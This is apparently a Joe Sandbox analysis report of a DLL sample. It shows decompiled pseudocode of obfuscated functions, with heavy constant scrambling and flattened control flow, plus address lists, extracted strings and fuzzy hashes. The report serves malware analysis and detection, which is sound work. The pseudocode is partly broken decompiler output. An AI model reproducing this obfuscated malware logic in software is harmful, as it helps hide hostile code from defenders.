				_v1608 = _v1608 + 0xffff560f;
				_v1608 = _v1608 ^ 0x005a0ce7;
				_v1648 = 0x53669a;
				_t508 = 0x60;
				_v1648 = _v1648 * 0x53;
				_v1648 = _v1648 * 0x2d;
				_v1648 = _v1648 ^ 0xc0c27601;
				_v1616 = 0xf6b3f;
				_v1616 = _v1616 << 0xf;
				_v1616 = _v1616 ^ 0xb591763f;
				_v1712 = 0xd11a2f;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 + 0x34a7;
				_v1712 = _v1712 + 0xffffa6d8;
				_v1712 = _v1712 ^ 0x001715b5;
				_v1744 = 0x782a81;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 >> 3;
				_v1744 = _v1744 * 0x57;
				_v1744 = _v1744 ^ 0x00239f7e;
				_v1728 = 0xdf27c0;
				_v1728 = _v1728 + 0xb655;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 | 0x1084c50a;
				_v1728 = _v1728 ^ 0x10890bcf;
				_v1612 = 0xd31e5c;
				_v1612 = _v1612 / _t508;
				_v1612 = _v1612 ^ 0x000f28c0;
				_v1640 = 0xad59ab;
				_v1640 = _v1640 ^ 0x540bc483;
				_v1640 = _v1640 ^ 0x54aa6eab;
				_v1596 = 0xfc600e;
				_v1596 = _v1596 << 1;
				_v1596 = _v1596 ^ 0x01f16920;
				_v1676 = 0x70f7b6;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 | 0x834faa8e;
				_v1676 = _v1676 ^ 0x837cfefc;
				_v1580 = 0xc67f49;
				_v1580 = _v1580 ^ 0x220388f4;
				_v1580 = _v1580 ^ 0x22cc2a29;
				_v1604 = 0xf53a42;
				_v1604 = _v1604 + 0x1d20;
				_v1604 = _v1604 ^ 0x00fba671;
				_v1764 = 0x3c20a1;
				_v1764 = _v1764 << 0xa;
				_v1764 = _v1764 | 0xcc5879dc;
				_v1764 = _v1764 + 0x7d87;
				_v1764 = _v1764 ^ 0xfcd01767;
				_v1736 = 0xfcd131;
				_v1736 = _v1736 | 0xb098ccc9;
				_v1736 = _v1736 + 0x1f04;
				_v1736 = _v1736 | 0xe0e1c446;
				_v1736 = _v1736 ^ 0xf0fbfa39;
				_v1684 = 0x6ca78a;
				_v1684 = _v1684 >> 0xd;
				_t509 = 0x5d;
				_v1684 = _v1684 / _t509;
				_v1684 = _v1684 ^ 0x00062aae;
				_v1576 = 0x28ea20;
				_t510 = 0x2d;
				_v1576 = _v1576 / _t510;
				_v1576 = _v1576 ^ 0x000e137d;
				_v1632 = 0x34444a;
				_v1632 = _v1632 + 0xb7da;
				_v1632 = _v1632 ^ 0x00330b1f;
				_v1748 = 0x707d69;
				_v1748 = _v1748 << 0xb;
				_v1748 = _v1748 ^ 0xb1536161;
				_v1748 = _v1748 + 0xffff04ff;
				_v1748 = _v1748 ^ 0x32b99598;
				_v1696 = 0x3e2d26;
				_v1696 = _v1696 + 0x9f8b;
				_v1696 = _v1696 + 0xf840;
				_v1696 = _v1696 ^ 0x00305f5f;
				_v1700 = 0x43ad40;
				_t511 = 0x7e;
				_v1700 = _v1700 / _t511;
				_v1700 = _v1700 + 0x17b0;
				_v1700 = _v1700 ^ 0x000023e6;
				_v1628 = 0x615af9;
				_v1628 = _v1628 | 0xc5f525fd;
				_v1628 = _v1628 ^ 0xc5f01915;
				_v1752 = 0xf7a5b1;
				_v1752 = _v1752 | 0xfe49737c;
				_v1752 = _v1752 + 0x9fc0;
				_v1752 = _v1752 ^ 0x9fa1c746;
				_v1752 = _v1752 ^ 0x60a54bb7;
				_v1572 = 0x7bbdbf;
				_t512 = 0xe;
				_v1572 = _v1572 * 0x2d;
				_v1572 = _v1572 ^ 0x15c0521a;
				_v1620 = 0xd84802;
				_v1620 = _v1620 ^ 0x3749a239;
				_v1620 = _v1620 ^ 0x37909643;
				_v1644 = 0xebc394;
				_v1644 = _v1644 << 8;
				_v1644 = _v1644 ^ 0xebca8902;
				_v1692 = 0x3d115c;
				_v1692 = _v1692 ^ 0xaeae6a77;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 ^ 0x000f7307;
				_v1660 = 0x8a3dcc;
				_v1660 = _v1660 ^ 0x1263d9af;
				_v1660 = _v1660 / _t512;
				_v1660 = _v1660 ^ 0x015f4699;
				_v1592 = 0x64d88c;
				_v1592 = _v1592 ^ 0xc97cb881;
				_v1592 = _v1592 ^ 0xc91c2e76;
				_v1708 = 0x9c1e71;
				_v1708 = _v1708 ^ 0xd16e05af;
				_v1708 = _v1708 | 0x50445732;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x3ec99884;
				_v1716 = 0xd3e518;
				_v1716 = _v1716 + 0xffff72ee;
				_t501 = _v1568;
				_v1716 = _v1716 / _t564;
				_v1716 = _v1716 << 0xa;
				_v1716 = _v1716 ^ 0x8cea7ffc;
				while(1) {
					L1:
					_t513 = 0x5c;
					while(1) {
						L2:
						_t478 = 0x5243326;
						do {
							L3:
							if(_t562 == 0x22d4857) {
								_push(_v1688);
								_push(_v1624);
								_push(_v1680);
								_t479 = E00D4E1F8(0xd31030, _v1740, __eflags);
								E00D37078( &_v520, __eflags);
								_t482 =  *0xd56214; // 0x0
								_t486 =  *0xd56214; // 0x0
								__eflags = _t486 + 0x34;
								E00D3F96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
								E00D4FECB(_t479, _v1600, _v1608, _v1648, _v1616);
								_t568 =  &(_t568[0x10]);
								_t562 = 0x6f5d8c5;
								goto L19;
							} else {
								if(_t562 == 0x3a11f46) {
									_push(_v1612);
									_push(_v1728);
									_push(_v1744);
									__eflags = E00D32DEA(_v1640,  &_v1564, _v1596, 0xd310a0, _v1756, _v1676, 0xd310a0, 0xd310a0, _v1580, _v1604, 0xd310a0, 0xd310a0, _v1652, _v1764, _v1736, _v1684, _v1576, E00D4E1F8(0xd310a0, _v1712, __eflags));
									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
									E00D4FECB(_t490, _v1632, _v1748, _v1696, _v1700);
									_t568 =  &(_t568[0x16]);
									L19:
									_t478 = 0x5243326;
									_t513 = 0x5c;
									goto L20;
								} else {
									if(_t562 == _t478) {
										_t494 = E00D400C5( &_v1560, _v1628, _v1752);
										_pop(_t522);
										_t497 = E00D42CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
										_t568 =  &(_t568[9]);
										__eflags = _t497;
										_t562 = 0xcd5a5d6;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t562 == 0x6f5d8c5) {
											_t502 =  *0xd56214; // 0x0
											_t503 = _t502 + 0x23c;
											while(1) {
												__eflags =  *_t503 - _t513;
												if(__eflags == 0) {
													break;
												}
												_t503 = _t503 + 2;
												__eflags = _t503;
											}
											_t501 = _t503 + 2;
											_t562 = 0x3a11f46;
											goto L2;
										} else {
											if(_t562 == 0xbc1c7ad) {
												E00D31A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
												_t568 =  &(_t568[8]);
												_t562 = 0x22d4857;
												while(1) {
													L1:
													_t513 = 0x5c;
													L2:
													_t478 = 0x5243326;
													goto L3;
												}
											} else {
												if(_t562 != 0xcd5a5d6) {
													goto L20;
												} else {
													E00D353D0(_v1592, _v1708, _v1716, _v1564);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1568;
							L20:
							__eflags = _t562 - 0xbc3e7f;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x00d3c6b8
0x00d3c6be
0x00d3c6cb
0x00d3c6d8
0x00d3c6e3
0x00d3c6eb
0x00d3c6f3
0x00d3c6fb
0x00d3c703
0x00d3c70b
0x00d3c713
0x00d3c71b
0x00d3c723
0x00d3c72b
0x00d3c733
0x00d3c73b
0x00d3c74b
0x00d3c74f
0x00d3c754
0x00d3c75c
0x00d3c767
0x00d3c772
0x00d3c77d
0x00d3c785
0x00d3c78a
0x00d3c792
0x00d3c79a
0x00d3c7a5
0x00d3c7ad
0x00d3c7b8
0x00d3c7c0
0x00d3c7c5
0x00d3c7ca
0x00d3c7d2
0x00d3c7da
0x00d3c7e2
0x00d3c7e8
0x00d3c7ed
0x00d3c7f3
0x00d3c7fd
0x00d3c800
0x00d3c801
0x00d3c803
0x00d3c807
0x00d3c80f
0x00d3c81f
0x00d3c828
0x00d3c829
0x00d3c835
0x00d3c839
0x00d3c841
0x00d3c84f
0x00d3c853
0x00d3c85b
0x00d3c863
0x00d3c86e
0x00d3c876
0x00d3c881
0x00d3c889
0x00d3c891
0x00d3c895
0x00d3c89f
0x00d3c8a7
0x00d3c8af
0x00d3c8b4
0x00d3c8bc
0x00d3c8c4
0x00d3c8d3
0x00d3c8d6
0x00d3c8da
0x00d3c8e2
0x00d3c8ea
0x00d3c8f2
0x00d3c8fa
0x00d3c902
0x00d3c90a
0x00d3c912
0x00d3c922
0x00d3c926
0x00d3c92e
0x00d3c936
0x00d3c93e
0x00d3c946
0x00d3c94e
0x00d3c956
0x00d3c961
0x00d3c969
0x00d3c974
0x00d3c97f
0x00d3c98a
0x00d3c995
0x00d3c9a8
0x00d3c9a9
0x00d3c9b8
0x00d3c9bf
0x00d3c9ca
0x00d3c9d5
0x00d3c9dd
0x00d3c9e8
0x00d3c9f0
0x00d3c9f5
0x00d3c9fd
0x00d3ca05
0x00d3ca0d
0x00d3ca15
0x00d3ca1a
0x00d3ca24
0x00d3ca28
0x00d3ca30
0x00d3ca38
0x00d3ca40
0x00d3ca45
0x00d3ca4d
0x00d3ca55
0x00d3ca69
0x00d3ca70
0x00d3ca7b
0x00d3ca86
0x00d3ca91
0x00d3ca9c
0x00d3caa7
0x00d3caae
0x00d3cab9
0x00d3cac1
0x00d3cac5
0x00d3cacd
0x00d3cad5
0x00d3cae0
0x00d3caeb
0x00d3caf6
0x00d3cb03
0x00d3cb0e
0x00d3cb19
0x00d3cb21
0x00d3cb26
0x00d3cb2e
0x00d3cb36
0x00d3cb3e
0x00d3cb46
0x00d3cb4e
0x00d3cb56
0x00d3cb5e
0x00d3cb66
0x00d3cb6e
0x00d3cb79
0x00d3cb7e
0x00d3cb84
0x00d3cb8c
0x00d3cb9e
0x00d3cba3
0x00d3cbac
0x00d3cbb7
0x00d3cbc2
0x00d3cbcd
0x00d3cbd8
0x00d3cbe0
0x00d3cbe5
0x00d3cbed
0x00d3cbf5
0x00d3cbfd
0x00d3cc05
0x00d3cc0d
0x00d3cc15
0x00d3cc1d
0x00d3cc29
0x00d3cc2e
0x00d3cc34
0x00d3cc3c
0x00d3cc44
0x00d3cc4f
0x00d3cc5a
0x00d3cc65
0x00d3cc6d
0x00d3cc75
0x00d3cc7d
0x00d3cc85
0x00d3cc8d
0x00d3cca0
0x00d3cca1
0x00d3cca8
0x00d3ccb3
0x00d3ccbe
0x00d3ccc9
0x00d3ccd4
0x00d3ccdf
0x00d3cce7
0x00d3ccf2
0x00d3ccfa
0x00d3cd02
0x00d3cd07
0x00d3cd0f
0x00d3cd17
0x00d3cd25
0x00d3cd29
0x00d3cd33
0x00d3cd43
0x00d3cd4e
0x00d3cd59
0x00d3cd61
0x00d3cd69
0x00d3cd71
0x00d3cd76
0x00d3cd7e
0x00d3cd86
0x00d3cd94
0x00d3cd9b
0x00d3cd9f
0x00d3cda4
0x00d3cdac
0x00d3cdac
0x00d3cdae
0x00d3cdaf
0x00d3cdaf
0x00d3cdaf
0x00d3cdb4
0x00d3cdb4
0x00d3cdba
0x00d3cfa1
0x00d3cfaa
0x00d3cfb1
0x00d3cfb9
0x00d3cfc7
0x00d3cfe8
0x00d3d00e
0x00d3d013
0x00d3d018
0x00d3d03b
0x00d3d040
0x00d3d043
0x00000000
0x00d3cdc0
0x00d3cdc2
0x00d3cef5
0x00d3cf01
0x00d3cf05
0x00d3cf71
0x00d3cf91
0x00d3cf94
0x00d3cf99
0x00d3d048
0x00d3d04a
0x00d3d04f
0x00000000
0x00d3cdc8
0x00d3cdca
0x00d3ce91
0x00d3ce96
0x00d3ced5
0x00d3cedc
0x00d3cedf
0x00d3cee1
0x00d3cee9
0x00000000
0x00d3cdd0
0x00d3cdd6
0x00d3ce5f
0x00d3ce65
0x00d3ce70
0x00d3ce70
0x00d3ce73
0x00000000
0x00000000
0x00d3ce6d
0x00d3ce6d
0x00d3ce6d
0x00d3ce75
0x00d3ce78
0x00000000
0x00d3cddc
0x00d3cde2
0x00d3ce4d
0x00d3ce52
0x00d3ce55
0x00d3cdac
0x00d3cdac
0x00d3cdae
0x00d3cdaf
0x00d3cdaf
0x00000000
0x00d3cdaf
0x00d3cde4
0x00d3cdea
0x00000000
0x00d3cdf0
0x00d3ce06
0x00d3ce0c
0x00d3cdea
0x00d3cde2
0x00d3cdd6
0x00d3cdca
0x00d3cdc2
0x00d3ce0d
0x00d3ce1e
0x00d3d050
0x00d3d050
0x00d3d050
0x00000000
0x00d3d05c
0x00d3cdaf

Strings

(, xrefs: 00D3CB8C
#, xrefs: 00D3CC3C
E*, xrefs: 00D3C853
2WDP, xrefs: 00D3CD69
,.X, xrefs: 00D3C6D8
JD4, xrefs: 00D3CBB7
i}p, xrefs: 00D3CBD8
__0, xrefs: 00D3CC15
U{K, xrefs: 00D3C7E2

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
API String ID: 0-2449995950
Opcode ID: f2d62348fc17554d1d0e7e7ab2542b5569efa3cda4d57ce5ec67805faddd0023
Instruction ID: 48ced30e956fc26fa6a0777d1a86e88c200693c32305824e6f8697813c1a066c
Opcode Fuzzy Hash: f2d62348fc17554d1d0e7e7ab2542b5569efa3cda4d57ce5ec67805faddd0023
Instruction Fuzzy Hash: 7222207150C3809FD3A8CF64D98AA8BBBF2FBC4358F10891DE19996260D7B58949CF13

Uniqueness

Uniqueness Score: -1.00%

Function 00D4E955, Relevance: 11.6, Strings: 9, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00D4E955() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				unsigned int _v708;
				signed int _t316;
				void* _t319;
				intOrPtr _t320;
				intOrPtr _t323;
				intOrPtr _t328;
				void* _t331;
				void* _t334;
				void* _t335;
				char _t342;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				unsigned int* _t372;

				_t372 =  &_v708;
				_v576 = 0xda0c08;
				_v576 = _v576 + 0xffff47d7;
				_t335 = 0x67615db;
				_v576 = _v576 ^ 0x00d953de;
				_v616 = 0x1aa62a;
				_v616 = _v616 ^ 0x887273cb;
				_v616 = _v616 ^ 0x8868d4e1;
				_v696 = 0x6cc5ff;
				_v696 = _v696 + 0xffff0f33;
				_v696 = _v696 + 0xffffebff;
				_v696 = _v696 + 0xffff9323;
				_v696 = _v696 ^ 0x006b5457;
				_v620 = 0xd441f6;
				_v620 = _v620 >> 2;
				_v620 = _v620 ^ 0x0035107d;
				_v668 = 0xe6e8c4;
				_v668 = _v668 + 0xffff0cc3;
				_v668 = _v668 | 0x11364c4e;
				_v668 = _v668 ^ 0x11fae4e7;
				_v664 = 0xedeede;
				_v664 = _v664 + 0x8dc4;
				_v664 = _v664 >> 0xb;
				_v664 = _v664 ^ 0x00096569;
				_v644 = 0x7bf23b;
				_v644 = _v644 + 0x7679;
				_v644 = _v644 << 2;
				_v644 = _v644 ^ 0x01f0e7c7;
				_v588 = 0xd55e4f;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x000a9525;
				_v648 = 0x4b711e;
				_v648 = _v648 + 0xffff1f62;
				_v648 = _v648 ^ 0xa93f12d6;
				_v648 = _v648 ^ 0xa9763896;
				_v584 = 0xdb5f0a;
				_v584 = _v584 * 0x19;
				_t334 = 0;
				_v584 = _v584 ^ 0x156e4d85;
				_v608 = 0x3263c9;
				_v608 = _v608 + 0xe60;
				_v608 = _v608 ^ 0x0036f835;
				_v640 = 0x3b5ffd;
				_t365 = 0x46;
				_v640 = _v640 * 5;
				_v640 = _v640 / _t365;
				_v640 = _v640 ^ 0x000ce458;
				_v708 = 0xb95ed6;
				_t366 = 0x5a;
				_v708 = _v708 / _t366;
				_v708 = _v708 ^ 0x64dff63e;
				_v708 = _v708 >> 0x10;
				_v708 = _v708 ^ 0x000970e9;
				_v672 = 0xda5c0b;
				_v672 = _v672 >> 5;
				_v672 = _v672 * 0x6e;
				_v672 = _v672 ^ 0x02ed68c8;
				_v600 = 0xb0c206;
				_v600 = _v600 + 0x21e9;
				_v600 = _v600 ^ 0x00b07205;
				_v684 = 0x1b8021;
				_v684 = _v684 << 2;
				_v684 = _v684 >> 0xb;
				_v684 = _v684 << 8;
				_v684 = _v684 ^ 0x0007a69d;
				_v700 = 0x716346;
				_v700 = _v700 >> 0xe;
				_v700 = _v700 << 9;
				_v700 = _v700 | 0x54417142;
				_v700 = _v700 ^ 0x544d1ccb;
				_v704 = 0x83733f;
				_v704 = _v704 << 0xe;
				_v704 = _v704 << 1;
				_t367 = 0xf;
				_v704 = _v704 / _t367;
				_v704 = _v704 ^ 0x0c51ca4a;
				_v676 = 0x255e7;
				_v676 = _v676 ^ 0x45c0186f;
				_v676 = _v676 ^ 0x0e243a79;
				_v676 = _v676 ^ 0x4be8c079;
				_v652 = 0xc8a42f;
				_t368 = 0x3b;
				_v652 = _v652 * 0x1e;
				_v652 = _v652 + 0xffffdb98;
				_v652 = _v652 ^ 0x178e8932;
				_v660 = 0x399dd9;
				_v660 = _v660 << 0x10;
				_v660 = _v660 << 1;
				_v660 = _v660 ^ 0x3bb87d79;
				_v596 = 0x4a6152;
				_v596 = _v596 + 0xeb3a;
				_v596 = _v596 ^ 0x00451e15;
				_v604 = 0x1a296a;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x000806f7;
				_v628 = 0x8a6a9a;
				_v628 = _v628 << 0xc;
				_v628 = _v628 / _t368;
				_v628 = _v628 ^ 0x02ddb0c3;
				_v612 = 0x56dff1;
				_v612 = _v612 << 4;
				_v612 = _v612 ^ 0x056559b2;
				_v592 = 0xb835f;
				_v592 = _v592 ^ 0x56373199;
				_v592 = _v592 ^ 0x563f1b5a;
				_v636 = 0x2555d1;
				_v636 = _v636 + 0xffff7c76;
				_v636 = _v636 | 0x931e680c;
				_v636 = _v636 ^ 0x933edc2a;
				_v688 = 0x729e7a;
				_v688 = _v688 + 0x52a9;
				_v688 = _v688 << 6;
				_v688 = _v688 ^ 0x08219d26;
				_v688 = _v688 ^ 0x149a839d;
				_v656 = 0xbb5b70;
				_v656 = _v656 + 0x6c7b;
				_v656 = _v656 | 0x24d7418a;
				_v656 = _v656 ^ 0x24f0c3f7;
				_v692 = 0xac0342;
				_v692 = _v692 + 0x6c81;
				_v692 = _v692 >> 0xd;
				_v692 = _v692 + 0xbde1;
				_v692 = _v692 ^ 0x00055202;
				_v632 = 0x18da0d;
				_t369 = 0x57;
				_v632 = _v632 * 0x5d;
				_v632 = _v632 + 0xffff6f25;
				_v632 = _v632 ^ 0x090e1c26;
				_v580 = 0xa5e89c;
				_v580 = _v580 / _t369;
				_v580 = _v580 ^ 0x000ce540;
				_v680 = 0x842c1c;
				_v680 = _v680 << 5;
				_v680 = _v680 ^ 0x259e7cb4;
				_v680 = _v680 + 0xffff46bd;
				_v680 = _v680 ^ 0x3515c03d;
				_v624 = 0x501187;
				_v624 = _v624 ^ 0x46ba0327;
				_v624 = _v624 ^ 0x46eeb458;
				_t364 = _v624;
				do {
					while(_t335 != 0x2d5e71a) {
						if(_t335 == 0x67615db) {
							_t335 = 0xf75ce9f;
							continue;
						} else {
							if(_t335 == 0x7a053ff) {
								E00D51538(_v680, _v624, _t364);
							} else {
								if(_t335 == 0x7a51f41) {
									_push(_v640);
									_push(_v608);
									_push(_v584);
									_t319 = E00D4E1F8(0xd31000, _v648, __eflags);
									_t320 =  *0xd56214; // 0x0
									_t323 =  *0xd56214; // 0x0
									E00D52D0A(_v672, __eflags, _t323 + 0x23c, _v600, _v684, _v700, 0xd31000,  &_v524, _t320 + 0x34, _t319);
									E00D4FECB(_t319, _v704, _v676, _v652, _v660);
									_t372 =  &(_t372[0xe]);
									_t335 = 0x2d5e71a;
									continue;
								} else {
									if(_t335 == 0xa48fbff) {
										_v572 = _v572 - E00D35477(_t335);
										_t335 = 0x7a51f41;
										asm("sbb [esp+0x9c], edx");
										continue;
									} else {
										if(_t335 == 0xd7f7f02) {
											_t328 = _v568;
											_t342 = _v572;
											_v560 = _t328;
											_v552 = _t328;
											_v544 = _t328;
											_v536 = _t328;
											_v532 = _v620;
											_v564 = _t342;
											_v556 = _t342;
											_v548 = _t342;
											_v540 = _t342;
											_t331 = E00D544FF(_v656, _v692, _t342, _v632, _t342, _v580,  &_v564, _t364);
											_t372 =  &(_t372[6]);
											__eflags = _t331;
											_t334 =  !=  ? 1 : _t334;
											_t335 = 0x7a053ff;
											continue;
										} else {
											if(_t335 != 0xf75ce9f) {
												goto L16;
											} else {
												E00D4CA1F(_v668, _v664,  &_v572, _v644, _v588);
												_t372 =  &(_t372[3]);
												_t335 = 0xa48fbff;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t334;
					}
					_t316 = E00D545CA( &_v524, _v596, _t335, _t335, _v604, _v628, _v612, _v616, _v592, _v636, 0, _v688, _v696, _v576);
					_t364 = _t316;
					_t372 =  &(_t372[0xc]);
					__eflags = _t316 - 0xffffffff;
					if(__eflags == 0) {
						_t335 = 0xc46350e;
						goto L16;
					} else {
						_t335 = 0xd7f7f02;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t335 - 0xc46350e;
				} while (__eflags != 0);
				goto L19;
			}

0x00d4e955
0x00d4e95f
0x00d4e96c
0x00d4e977
0x00d4e97c
0x00d4e987
0x00d4e98f
0x00d4e997
0x00d4e99f
0x00d4e9a7
0x00d4e9af
0x00d4e9b7
0x00d4e9bf
0x00d4e9c7
0x00d4e9cf
0x00d4e9d4
0x00d4e9dc
0x00d4e9e4
0x00d4e9ec
0x00d4e9f4
0x00d4e9fc
0x00d4ea04
0x00d4ea0c
0x00d4ea11
0x00d4ea19
0x00d4ea21
0x00d4ea29
0x00d4ea2e
0x00d4ea36
0x00d4ea41
0x00d4ea49
0x00d4ea54
0x00d4ea5c
0x00d4ea64
0x00d4ea6c
0x00d4ea74
0x00d4ea87
0x00d4ea8e
0x00d4ea90
0x00d4ea9b
0x00d4eaa3
0x00d4eaab
0x00d4eab3
0x00d4eac2
0x00d4eac5
0x00d4ead1
0x00d4ead5
0x00d4eadd
0x00d4eae9
0x00d4eaec
0x00d4eaf0
0x00d4eaf8
0x00d4eafd
0x00d4eb05
0x00d4eb0d
0x00d4eb17
0x00d4eb1b
0x00d4eb23
0x00d4eb2b
0x00d4eb33
0x00d4eb3b
0x00d4eb43
0x00d4eb48
0x00d4eb4d
0x00d4eb52
0x00d4eb5a
0x00d4eb62
0x00d4eb67
0x00d4eb6e
0x00d4eb76
0x00d4eb7e
0x00d4eb86
0x00d4eb8b
0x00d4eb95
0x00d4eb9a
0x00d4eba0
0x00d4eba8
0x00d4ebb0
0x00d4ebb8
0x00d4ebc0
0x00d4ebc8
0x00d4ebd5
0x00d4ebd8
0x00d4ebdc
0x00d4ebe4
0x00d4ebec
0x00d4ebf4
0x00d4ebf9
0x00d4ebfd
0x00d4ec05
0x00d4ec10
0x00d4ec1b
0x00d4ec26
0x00d4ec2e
0x00d4ec33
0x00d4ec3b
0x00d4ec43
0x00d4ec50
0x00d4ec54
0x00d4ec5c
0x00d4ec64
0x00d4ec69
0x00d4ec71
0x00d4ec7c
0x00d4ec87
0x00d4ec92
0x00d4ec9a
0x00d4eca2
0x00d4ecaa
0x00d4ecb2
0x00d4ecba
0x00d4ecc2
0x00d4ecc7
0x00d4eccf
0x00d4ecd7
0x00d4ecdf
0x00d4ece7
0x00d4ecef
0x00d4ecf7
0x00d4ecff
0x00d4ed07
0x00d4ed0c
0x00d4ed14
0x00d4ed1c
0x00d4ed29
0x00d4ed2a
0x00d4ed2e
0x00d4ed36
0x00d4ed3e
0x00d4ed52
0x00d4ed59
0x00d4ed64
0x00d4ed6c
0x00d4ed71
0x00d4ed79
0x00d4ed86
0x00d4ed8e
0x00d4ed96
0x00d4ed9e
0x00d4eda6
0x00d4edaa
0x00d4edaa
0x00d4edbc
0x00d4ef46
0x00000000
0x00d4edc2
0x00d4edc8
0x00d4efca
0x00d4edce
0x00d4edd4
0x00d4eec6
0x00d4eecf
0x00d4eed3
0x00d4eede
0x00d4eee8
0x00d4ef0a
0x00d4ef1d
0x00d4ef34
0x00d4ef39
0x00d4ef3c
0x00000000
0x00d4edda
0x00d4ede0
0x00d4eeae
0x00d4eeb5
0x00d4eeba
0x00000000
0x00d4ede6
0x00d4ede8
0x00d4ee20
0x00d4ee27
0x00d4ee2e
0x00d4ee35
0x00d4ee3c
0x00d4ee43
0x00d4ee4f
0x00d4ee65
0x00d4ee75
0x00d4ee7c
0x00d4ee83
0x00d4ee8f
0x00d4ee96
0x00d4ee9a
0x00d4ee9c
0x00d4ee9f
0x00000000
0x00d4edea
0x00d4edf0
0x00000000
0x00d4edf6
0x00d4ee11
0x00d4ee16
0x00d4ee19
0x00000000
0x00d4ee19
0x00d4edf0
0x00d4ede8
0x00d4ede0
0x00d4edd4
0x00d4edc8
0x00d4efd3
0x00d4efdc
0x00d4efdc
0x00d4ef98
0x00d4ef9d
0x00d4ef9f
0x00d4efa2
0x00d4efa5
0x00d4efae
0x00000000
0x00d4efa7
0x00d4efa7
0x00000000
0x00d4efa7
0x00000000
0x00d4efb3
0x00d4efb3
0x00d4efb3
0x00000000

Strings

BqAT, xrefs: 00D4EB6E
RaJ, xrefs: 00D4EC05
{l, xrefs: 00D4ECDF
ie, xrefs: 00D4EA11
p, xrefs: 00D4EAFD
!, xrefs: 00D4EB2B
:, xrefs: 00D4EC10
yv, xrefs: 00D4EA21
WTk, xrefs: 00D4E9BF

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: :$BqAT$RaJ$WTk$ie$yv${l$!$p
API String ID: 0-4263964199
Opcode ID: 7b933cd420b88963264d3c1c4dbb99172763b0ad6ed974bbefacb24c7597762f
Instruction ID: b71f9c83caf127213153b54d7ff94e268f1618351262da6e36b523571bb5c2ab
Opcode Fuzzy Hash: 7b933cd420b88963264d3c1c4dbb99172763b0ad6ed974bbefacb24c7597762f
Instruction Fuzzy Hash: 5CF13EB14093809FC3A8CF25C54AA5BFBE1FBC4758F10891DF2AA86260D7B18949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D536AA, Relevance: 10.4, Strings: 8, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00D536AA() {
				signed int _t373;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				intOrPtr _t383;
				signed int _t385;
				signed int _t387;
				void* _t392;
				signed int _t435;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t449;
				signed int* _t453;

				 *_t453 = 0x507140;
				_t392 = 0xe12044f;
				_t453[4] =  *_t453 * 0x71;
				_t438 = 0x6b;
				_t453[5] = _t453[4] / _t438;
				_t453[5] = _t453[5] >> 9;
				_t453[5] = _t453[5] ^ 0x00002a7b;
				_t453[9] = 0x87b94d;
				_t453[9] = _t453[9] + 0xffff92a0;
				_t453[9] = _t453[9] + 0x79ac;
				_t453[9] = _t453[9] >> 3;
				_t453[9] = _t453[9] ^ 0x0010f8b2;
				_t453[0x18] = 0x43735f;
				_t453[0x18] = _t453[0x18] << 0xa;
				_t453[0x18] = _t453[0x18] + 0xffff408e;
				_t453[0x18] = _t453[0x18] ^ 0x0dccbc8d;
				_t453[0x19] = 0x2e99ff;
				_t439 = 0x48;
				_push("true");
				_t453[0x19] = _t453[0x19] / _t439;
				_t453[0x19] = _t453[0x19] | 0xc1c83132;
				_t453[0x19] = _t453[0x19] ^ 0xc1c60879;
